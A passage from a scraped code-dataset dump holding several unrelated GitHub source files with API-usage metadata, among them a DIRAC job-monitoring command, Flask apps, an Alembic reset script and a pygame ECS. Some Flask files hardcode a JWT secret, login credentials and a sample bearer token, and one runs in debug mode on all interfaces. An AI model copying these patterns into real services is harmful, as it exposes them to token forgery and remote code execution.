"sklearn.ensemble.RandomForestRegressor", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 166, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.RFE", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 207, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 209, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 211, "usage_type": "call"}, {"api_name":
"sklearn.ensemble.GradientBoostingClassifier", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 215, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.RFECV", "line_number": 223, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 223, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 242, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 242, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 244, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 244, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 246, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 246, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 248, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 248, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 252, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 252, "usage_type": "call"}]} +{"seq_id": "19885901701", "text": "\"\"\" JobCommand\n \n The JobCommand class is a command class to know about present jobs efficiency\n \n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom DIRAC import S_OK, S_ERROR\nfrom DIRAC.ResourceStatusSystem.Command.Command import Command\nfrom DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import ResourceManagementClient\nfrom DIRAC.ResourceStatusSystem.Utilities import CSHelpers\nfrom DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB\n\n__RCSID__ = '$Id: $'\n\n\nclass JobCommand( Command ):\n \"\"\"\n Job \"master\" Command. 
\n  \"\"\"\n\n  def __init__( self, args = None, clients = None ):\n    \n    super( JobCommand, self ).__init__( args, clients )\n\n    if 'JobDB' in self.apis:\n      self.jobDB = self.apis[ 'JobDB' ]\n    else:\n      self.jobDB = JobDB()\n\n    if 'ResourceManagementClient' in self.apis:\n      self.rmClient = self.apis[ 'ResourceManagementClient' ]\n    else:\n      self.rmClient = ResourceManagementClient()\n\n\n  def _storeCommand( self, result ):\n    \"\"\"\n      Stores the results of the doNew method on the database.\n    \"\"\"\n    \n    for jobDict in result:\n      \n      lowerCaseJobDict = {}\n      for key, value in jobDict.iteritems():\n        lowerCaseJobDict[ key[0].lower() + key[1:] ] = value\n      \n      resQuery = self.rmClient.addOrModifyJobCache( **lowerCaseJobDict )\n      \n      if not resQuery[ 'OK' ]:\n        return resQuery\n    \n    return S_OK()\n\n  \n  def _prepareCommand( self ):\n    \"\"\"\n      JobCommand requires two arguments:\n      - name : <str>, timespan : <int> ( seconds )\n    \"\"\"\n\n    if not 'name' in self.args:\n      return S_ERROR( '\"name\" not found in self.args' )\n    name = self.args[ 'name' ]\n    \n    if not 'timespan' in self.args:\n      return S_ERROR( '\"timespan\" not found in self.args' )\n    timespan = self.args[ 'timespan' ]\n    \n    return S_OK( ( name, timespan ) )\n  \n  \n  def doNew( self, masterParams = None ):\n    \"\"\"\n      Gets the parameters to run, either from the master method or from its\n      own arguments.\n      \n      It contacts the WMSAdministrator with a list of site names, or a single \n      site.\n      \n      If there are jobs, they are recorded and then returned.\n    \"\"\"\n    \n    if masterParams is True:\n      self.args[ 'name' ] = ''\n\n    params = self._prepareCommand()\n    if not params[ 'OK' ]:\n      return params\n\n    name, timespan = params[ 'Value' ]\n    \n    condDict = {}\n    if name:\n      condDict = { 'Site' : name }\n\n    startTimeWindow = datetime.utcnow() - timedelta( seconds = timespan )\n    \n    results = self.jobDB.getCounters( 'Jobs', ['Site', 'Status'],\n                                      condDict, newer = startTimeWindow,\n                                      timeStamp = 'LastUpdateTime' )\n    \n    if not results[ 'OK' ]:\n      return results\n    # Results look like this\n    # [ ({'Status': 'Checking', 'Site': 'ANY'}, 6L), ...\n    \n    uniformResult = {}\n    \n    jobStatuses = ( 'Checking', 'Completed', 'Done', 'Failed', 'Killed', 'Matched',\n                    'Received', 'Rescheduled', 'Running', 'Staging', 'Stalled',\n                    'Waiting' )\n    \n    for resultTuple in results[ 'Value' ]:\n      \n      selectionDict, numberOfJobs = resultTuple\n      \n      siteName = selectionDict[ 'Site' ]\n      \n      if siteName in ( 'ANY', 'Multiple' ):\n        continue\n      \n      if not siteName in uniformResult:\n        uniformResult[ siteName ] = dict.fromkeys( jobStatuses, 0 )\n      \n      uniformResult[ siteName ][ selectionDict[ 'Status' ] ] = numberOfJobs\n\n    # Store results\n    storeRes = self._storeCommand( uniformResult )\n    if not storeRes[ 'OK' ]:\n      return storeRes\n    \n    return S_OK( uniformResult )\n  \n  \n  def doCache( self ):\n    \"\"\"\n    Method that reads the cache table and tries to read from it.
 It will \n    return a list of dictionaries if there are results.\n    \"\"\"\n    \n    params = self._prepareCommand()\n    if not params[ 'OK' ]:\n      return params\n    name, timespan = params[ 'Value' ]\n    \n    result = self.rmClient.selectJobCache( name )\n    if result[ 'OK' ]:\n      result = S_OK( [ dict( zip( result[ 'Columns' ], res ) ) for res in result[ 'Value' ] ] )\n    \n    return result\n  \n  \n  def doMaster( self ):\n    \"\"\"\n      Master method.\n      \n      Gets all sites and calls the doNew method.\n    \"\"\"\n    \n    siteNames = CSHelpers.getSites()  \n    if not siteNames[ 'OK' ]:\n      return siteNames\n    siteNames = siteNames[ 'Value' ]\n    \n    jobsResults = self.doNew( siteNames )\n    if not jobsResults[ 'OK' ]:\n      self.metrics[ 'failed' ].append( jobsResults[ 'Message' ] )\n    \n    return S_OK( self.metrics )  \n  \n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n\n#class JobsStatsCommand( Command ):\n#  \n#  def __init__( self, args = None, clients = None ):\n#    \n#    super( JobsStatsCommand, self ).__init__( args, clients )\n#    \n#    if 'JobsClient' in self.apis:\n#      self.jClient = self.apis[ 'JobsClient' ]\n#    else:\n#      self.jClient = JobsClient() \n#  \n#  def doCommand( self ):\n#    \"\"\" \n#    Return getJobStats from Jobs Client  \n#    \n#   :attr:`args`: \n#     - args[0]: string: should be a ValidElement\n#\n#     - args[1]: string: should be the name of the ValidElement\n#\n#  returns:\n#    {\n#      'MeanProcessedJobs': X\n#    }\n#    \"\"\"\n#\n#    return self.jClient.getJobsStats( self.args[0], self.args[1], self.args[2] )\n  \n################################################################################\n################################################################################\n\n#class JobsEffCommand( Command ):\n#\n#  def __init__( self, args = None, clients = None ):\n#    \n#    super( JobsEffCommand, self ).__init__( args, clients )\n#    \n#    if 'JobsClient' in self.apis:\n#      self.jClient = self.apis[ 'JobsClient' ]\n#    else:\n#      self.jClient = JobsClient() \n#  \n#  def doCommand( self ):\n#    \"\"\" \n#    Return getJobsEff from Jobs Client  \n#    \n#    :attr:`args`: \n#       - args[0]: string: should be a ValidElement\n#  \n#       - args[1]: string: should be the name of the ValidElement\n#\n#    returns:\n#      {\n#        'JobsEff': X\n#      }\n#    \"\"\"\n#    \n#    res = self.jClient.getJobsEff( self.args[0], self.args[1], self.args[2] )\n#    \n#    return S_OK( res )  \n\n################################################################################\n################################################################################\n\n#class SystemChargeCommand( Command ):\n#  \n#  def __init__( self, args = None, clients = None ):\n#    \n#    super( SystemChargeCommand, self ).__init__( args, clients )\n#    \n#    if 'JobsClient' in self.apis:\n#      self.jClient = self.apis[ 'JobsClient' ]\n#    else:\n#      self.jClient = JobsClient() \n#    \n#  def doCommand(self):\n#    \"\"\" Returns last hour system charge, and the system charge of an hour before\n#\n#    returns:\n#      {\n#        'LastHour': n_lastHour\n#        'anHourBefore': n_anHourBefore\n#      }\n#    \"\"\"\n#    \n#    \n#    
res = self.jClient.getSystemCharge()\n#\n# return S_OK( res ) \n \n################################################################################\n################################################################################\n\n#class JobsWMSCommand( Command ):\n# \n# def __init__( self, args = None, clients = None ):\n# \n# super( JobsWMSCommand, self ).__init__( args, clients )\n#\n# if 'WMSAdministrator' in self.apis:\n# self.wmsAdmin = self.apis[ 'WMSAdministrator' ]\n# else: \n# self.wmsAdmin = RPCClient( 'WorkloadManagement/WMSAdministrator' )\n# \n# def doCommand( self ):\n# \"\"\" \n# Returns simple jobs efficiency\n#\n# :attr:`args`: \n# - args[0]: string: should be a ValidElement\n# \n# - args[1]: string should be the name of the ValidElement\n#\n# returns:\n# {\n# 'Result': 'Good'|'Fair'|'Poor'|'Idle'|'Bad'\n# }\n# \"\"\"\n# \n# if not 'siteName' in self.args:\n# return self.returnERROR( S_ERROR( 'siteName is missing' ) )\n# siteName = self.args[ 'siteName' ]\n# \n# # If siteName is None, we take all sites\n# if siteName is None:\n# siteName = CSHelpers.getSites() \n# if not siteName[ 'OK' ]:\n# return self.returnERROR( siteName )\n# siteName = siteName[ 'Value' ]\n# \n# results = self.wmsAdmin.getSiteSummaryWeb( { 'Site' : siteName }, [], 0, 500 )\n#\n# if not results[ 'OK' ]:\n# return self.returnERROR( results )\n# results = results[ 'Value' ]\n# \n# if not 'ParameterNames' in results:\n# return self.returnERROR( S_ERROR( 'Malformed result dictionary' ) )\n# params = results[ 'ParameterNames' ]\n# \n# if not 'Records' in results:\n# return self.returnERROR( S_ERROR( 'Malformed result dictionary' ) )\n# records = results[ 'Records' ]\n# \n# jobResults = [] \n# \n# for record in records:\n# \n# jobDict = dict( zip( params , record ))\n# try:\n# jobDict[ 'Efficiency' ] = float( jobDict[ 'Efficiency' ] )\n# except KeyError, e:\n# return self.returnERROR( S_ERROR( e ) )\n# except ValueError, e:\n# return self.returnERROR( S_ERROR( e ) ) \n# \n# jobResults.append( jobDict )\n# \n# return S_OK( jobResults ) \n\n################################################################################\n\n", "repo_name": "coberger/DIRAC", "sub_path": "ResourceStatusSystem/Command/JobCommand.py", "file_name": "JobCommand.py", "file_ext": "py", "file_size_in_byte": 9975, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "DIRAC.ResourceStatusSystem.Command.Command.Command", "line_number": 18, "usage_type": "name"}, {"api_name": "DIRAC.WorkloadManagementSystem.DB.JobDB.JobDB", "line_number": 30, "usage_type": "call"}, {"api_name": "DIRAC.ResourceStatusSystem.Client.ResourceManagementClient.ResourceManagementClient", "line_number": 35, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 54, "usage_type": "call"}, {"api_name": "DIRAC.S_ERROR", "line_number": 64, "usage_type": "call"}, {"api_name": "DIRAC.S_ERROR", "line_number": 68, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 98, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 134, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 150, "usage_type": "call"}, {"api_name": "DIRAC.ResourceStatusSystem.Utilities.CSHelpers.getSites", "line_number": 162, "usage_type": "call"}, 
{"api_name": "DIRAC.ResourceStatusSystem.Utilities.CSHelpers", "line_number": 162, "usage_type": "name"}, {"api_name": "DIRAC.S_OK", "line_number": 171, "usage_type": "call"}]} +{"seq_id": "41291573827", "text": "from flask import Flask, request, send_from_directory, current_app\nfrom os.path import join\nfrom generator.generator import ZipGen\n\napp = Flask(__name__)\n\n@app.route('/config', methods=[\"POST\"])\ndef server():\n data = request.get_json()\n zipObj = ZipGen()\n zipfile = zipObj.generate(data)\n\n if not zipfile:\n return \"failed\", 500\n else:\n uploads = join(current_app.root_path, app.config['UPLOAD_FOLDER'])\n return send_from_directory(directory=uploads, filename=zipfile), 200\n\nif __name__ == \"__main__\":\n app.config['UPLOAD_FOLDER'] = 'generator/out/generated'\n app.run(host='0.0.0.0', port='5000', debug=True, use_reloader=True)\n\n", "repo_name": "malikakarsh/inSecure", "sub_path": "backend/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 9, "usage_type": "name"}, {"api_name": "generator.generator.ZipGen", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.current_app.root_path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "36373476599", "text": "# Standard Library\nimport argparse\nimport os\n\n# External Libraries\nfrom alembic import command\nfrom alembic.config import Config\n\n# VerdanTech Source\nfrom src import settings\n\n# Find the directory where this script is located\ncurrent_directory = os.path.dirname(os.path.abspath(__file__))\nconfig_directory = os.path.join(current_directory, \"alembic.ini\")\nscript_location = os.path.join(current_directory, \"alembic/\")\n\ndef reset_migrations():\n alembic_cfg = Config(config_directory)\n alembic_cfg.set_main_option(\"sqlalchemy.url\", settings.ALCHEMY_URI)\n alembic_cfg.set_main_option(\"script_location\", script_location)\n\n # Downgrade to the base\n command.downgrade(alembic_cfg, \"base\")\n # Upgrade to the head\n command.upgrade(alembic_cfg, \"head\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Reset database migrations\")\n parser.add_argument(\"--reset\", action='store_true', help=\"Reset all migrations\")\n args = parser.parse_args()\n \n if args.reset:\n reset_migrations()", "repo_name": "nathanielarking/VerdanTech", "sub_path": "src/infra/persistence/sqlalchemy/migrations/reset.py", "file_name": "reset.py", "file_ext": "py", "file_size_in_byte": 1036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "alembic.config.Config", "line_number": 18, "usage_type": "call"}, {"api_name": "src.settings.ALCHEMY_URI", "line_number": 19, "usage_type": "attribute"}, {"api_name": "src.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "alembic.command.downgrade", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.command", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.command.upgrade", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.command", "line_number": 25, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "42133170010", "text": "import logging\nfrom model import Model\nfrom data_serialize import load_processed_dataset, save_artifact\n\n\ndef run_train():\n model = Model()\n model.train(load_processed_dataset())\n logging.info(\"serialize model\")\n save_artifact(model, \"model.pkl\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)\n\n run_train()\n", "repo_name": "acnaweb/desafio-via", "sub_path": "src/app/models/train_model.py", "file_name": "train_model.py", "file_ext": "py", "file_size_in_byte": 383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "model.Model", "line_number": 7, "usage_type": "call"}, {"api_name": "model.train", "line_number": 8, "usage_type": "call"}, {"api_name": "data_serialize.load_processed_dataset", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 9, "usage_type": "call"}, {"api_name": "data_serialize.save_artifact", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "33790369126", "text": "from scrapeGG import scrapeGG\ninit = scrapeGG('API')\n\nimport json # for testing\n\n# test match api class\nrecent = init.getMatch(1)\n# second = init.getMatch(2)\n# top10 = init.getMatchSequence(10)\n\n# match class tests\n# print(json.dumps(recent.game_player_names(True), indent=2))\n# print(recent.game_player_names(True)) # stable\n\n# print(json.dumps(recent.self_stats(), indent=2))\n# print(recent.self_stats()) # stable\n\n# print(json.dumps(recent.player_stats('API'), indent=2))\n# print(recent.player_stats('API')) # stable\n\n# print(json.dumps(recent.overview(), indent=2))\n# print(recent.overview()) # unstable\n\n# print(json.dumps(recent.build(), indent=2))\n# print(recent.build()) # unstable\n\n\n# profile details class\nprofile = init.getProfile() # stable\n# print(json.dumps(profile.recently_played_with(), indent=2))\n# print(profile.recently_played_with()) # stable\n\n# print(json.dumps(profile.queue_stats('Total'), indent=2))\n# print(profile.queue_stats('Total')) # stable\n\n# print(json.dumps(profile.top_played_champions(), indent=2))\n# print(profile.top_played_champions()) # not really implemented but ok\n\nprint(json.dumps(profile.rank('Ranked Solo'), indent=2))\n# print(profile.rank('Ranked Solo')) # not really implemented but ok\n\ninit.quit()", "repo_name": "emily-yu/scrape.gg", "sub_path": "src/scrape_test.py", "file_name": "scrape_test.py", "file_ext": "py", "file_size_in_byte": 1246, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": 
"52", "api": [{"api_name": "scrapeGG.scrapeGG", "line_number": 2, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "17163963149", "text": "import pandas as pd\nimport pandas_gbq\nfrom google.cloud import bigquery\n\n\ndef import_xlsx(event, context):\n \"\"\"Triggered by a change to a Cloud Storage bucket. \n Function to access file uploaded to the bucket and transform it into a table in Bq.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n \n file = event\n nome_bucket = file['bucket']\n nome_objeto = file['name']\n \n # Instanciando cliente do BQ\n client = bigquery.Client()\n\n # Caminho para o objeto do bucket\n caminho_bucket = 'gs://' + nome_bucket + '/' + nome_objeto\n\n # Lendo objeto do bucket e armazenando como dataframe\n df = pd.read_excel(caminho_bucket, index_col=False)\n\n # Replace do . da extensao do arquivo para traco\n nome_tabela_bq = \"raw.\" + nome_objeto.replace('.','-')\n\n # Identificador da tabela no BQ\n identificador_tabela = \"nifty-time-351417.raw\" + nome_tabela_bq\n\n # Se a tabela nao existir cria ela e insere o dataframe na tabela nova\n try:\n client.get_table(identificador_tabela)\n except:\n pandas_gbq.to_gbq(df, nome_tabela_bq)\n", "repo_name": "diegoalvesdev/bot", "sub_path": "src/steps/cloud_functions/import_xlsx/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1164, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "google.cloud.bigquery.Client", "line_number": 19, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.read_excel", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas_gbq.to_gbq", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "33778355408", "text": "import json\nimport mimetypes\nfrom flask import Flask, Response, abort, jsonify, render_template, request, redirect, url_for, flash\nimport pickle\nimport flask\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\n\nfrom flask_jwt_extended import create_access_token\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_jwt_extended import jwt_required\nfrom flask_jwt_extended import JWTManager\n\napp = Flask(__name__)\n\napp.config[\"JWT_SECRET_KEY\"] = \"ml_secret_key\" # Change this!\njwt = JWTManager(app)\n\n@app.errorhandler(405)\ndef handle_error(e):\n print(e)\n data = {\n \"Error\": 405,\n \"Msg\": \"Method not allowed\"\n }\n response = Response(\n response=json.dumps(data),\n status=405,\n mimetype='application/json'\n )\n return response\n\ndef bad_request(message):\n response = jsonify({'message': message})\n response.status_code = 400\n return response\n\n\n\n# curl -X POST http://127.0.0.1:5000/login -H \"Content-type: application/json\" -d \"{\\\"username\\\" : \\\"dang\\\", \\\"password\\\" : \\\"vue\\\"}\"\n# Create a route to authenticate your users and return JWTs. 
The\n# create_access_token() function is used to actually generate the JWT.\n@app.route(\"/login\", methods=[\"POST\"])\ndef login():\n username = request.json.get(\"username\", None)\n password = request.json.get(\"password\", None)\n if username != \"dang\" or password != \"vue\":\n return jsonify({\"msg\": \"Bad username or password\"}), 401\n\n access_token = create_access_token(identity=username)\n return jsonify(access_token=access_token)\n\n\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\nmodel : GradientBoostingClassifier = pickle.load(open('ml/model.pkl', 'rb'))\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n\n float_features = [float(x) for x in request.form.values()]\n np_features = [np.array(float_features)]\n prediction = model.predict(np_features)\n prediction = prediction[0]\n\n return render_template('index.html', context=f'Predicted Class: {prediction}')\n\n\n\n# ADDING NEW ENDPOINT\n# curl -X POST localhost:5000/api/proba -H \"Content-type: application/json\" -H \"Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY5NjQ0NTMyNywianRpIjoiZGU3MzMyZTUtMzIzOC00YjgyLTlkODUtYTcyYmFiZDE5YTVlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRhbmciLCJuYmYiOjE2OTY0NDUzMjcsImV4cCI6MTY5NjQ0NjIyN30.8in7RuBkmWp0BmCnowtpiN1zAWexNCR673Fzs1E1HDM\" -d \"{\\\"Sepal_Length\\\" : 5.1, \\\"Sepal_Width\\\" : 3.5, \\\"Petal_Length\\\" : 1.4, \\\"Petal_Width\\\" : 0.2}\" \n\n@app.route('/api/proba', methods=['POST'])\n@jwt_required()\ndef proba():\n\n # a = 1\n # if a == 1:\n # return bad_request('message that appears in body')\n \n # Access the identity of the current user with get_jwt_identity\n current_user = get_jwt_identity()\n print(current_user)\n\n data = request.get_json()\n json_data = json.dumps(data)\n # print(json_data)\n dfreadjson = pd.read_json(json_data, orient='index').T\n # print(dfreadjson)\n prediction = model.predict(dfreadjson)\n _proba = model.predict_proba(dfreadjson)[:,1]\n print(prediction)\n\n return jsonify(model.predict_proba(dfreadjson)[:,1].tolist()), 200\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "dangvue0/flask_ml_api", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_jwt_extended.JWTManager", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 59, "usage_type": "call"}, 
{"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 63, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.form.values", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 101, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "29900451496", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 23 15:46:28 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nimport time\r\n\r\ndef img2txt(img):\r\n    serarr=['@','#','$','%','&','?','*','o','/','{','[','(','|','!','^','~','-','_',':',';',',','.','`',' ']\r\n    count=len(serarr)\r\n\r\n    asd =''# buffer for the output string\r\n    for h in range(img.shape[0]):#h\r\n        for w in range(img.shape[1]):#w\r\n            gray =img[h,w]\r\n            asd=asd+serarr[int(gray/(255/(count-1)))] # the higher the gray value (closer to white), the lighter the character used, e.g. the space ' '\r\n        asd=asd+'\\r\\n'\r\n    \r\n    print(asd)\r\n    return asd\r\n# imwrite()  \r\n#####################################\r\n# open the image\r\nimg = cv2.imread('pg2.jpg',0)\r\nimg=cv2.resize(img,(125,60))\r\n\r\n\r\nasd=img2txt(img)# call the function\r\n\r\n# save the result to a txt file\r\nf = open(\"text.txt\",'w')\r\nf.write(asd)\r\nf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "labAxiaoming/img2txt", "sub_path": "pg.py", "file_name": "pg.py", "file_ext": "py", "file_size_in_byte": 881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "33282028974", "text": "import pygame\nfrom systems import *\n\nclass Component(object):\n    def __init__(self, systems):\n        # each component has list of system types that must work on component\n        # and link to entity to perform component interaction\n        self.systems = systems\n        self.e = None\n\n\nclass Transform(Component):\n    def __init__(self, posx, posy):\n        super().__init__([])\n        self.x = posx\n        self.y = posy\n        self.a = 0  # ?\n\n\nclass BasicMovement(Component):\n    def __init__(self, speed):\n        super().__init__([PhysicsSystem])\n        self.speed = speed\n\n\nclass InertiaMovement(Component):\n    def __init__(self, friction, power, mass, maxspeed, speed=[0, 0]):\n        super().__init__([PhysicsSystem])\n        self.friction = friction\n        self.mass = mass\n        self.power = power\n        self.forces = [0, 0]  # x, y\n        self.speed = speed\n        self.maxspeed = maxspeed  # ?\n\n\nclass CollisionBox(Component):\n    def __init__(self, width, height):\n        super().__init__([CollisionSystem])\n        self.w = width\n        self.h = height\n\n\nclass PlayerCtrl(Component):\n    def __init__(self, keyBindsMap):\n        super().__init__([HandlerSystem, BotSystem])\n        # up; right; down; left\n        self.keyBinds = keyBindsMap\n        
self.direction = [0, 0, 0, 0]\n\n\nclass ChaseBotCtrl(Component):\n def __init__(self):\n super().__init__([BotSystem])\n # up; right; down; left\n self.direction = [0, 0, 0, 0]\n\n\nclass Square(Component):\n def __init__(self, color, size):\n super().__init__([RenderSystem])\n self.color = color\n self.size = size\n self.render_shape = lambda s, x, y: pygame.draw.rect(s, self.color, pygame.Rect(x, y, self.size, self.size))", "repo_name": "Med1v/pygameECSengine", "sub_path": "components.py", "file_name": "components.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.draw.rect", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "43829408598", "text": "import numpy as np\nimport scipy.io\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg.eigen.arpack import eigsh\nimport sys\nfrom itertools import chain\nfrom collections import defaultdict\n\n\ndef parse_index_file(filename):\n \"\"\"Parse index file.\"\"\"\n index = []\n for line in open(filename):\n index.append(int(line.strip()))\n return index\n\n\ndef sample_mask(idx, l):\n \"\"\"Create mask.\"\"\"\n mask = 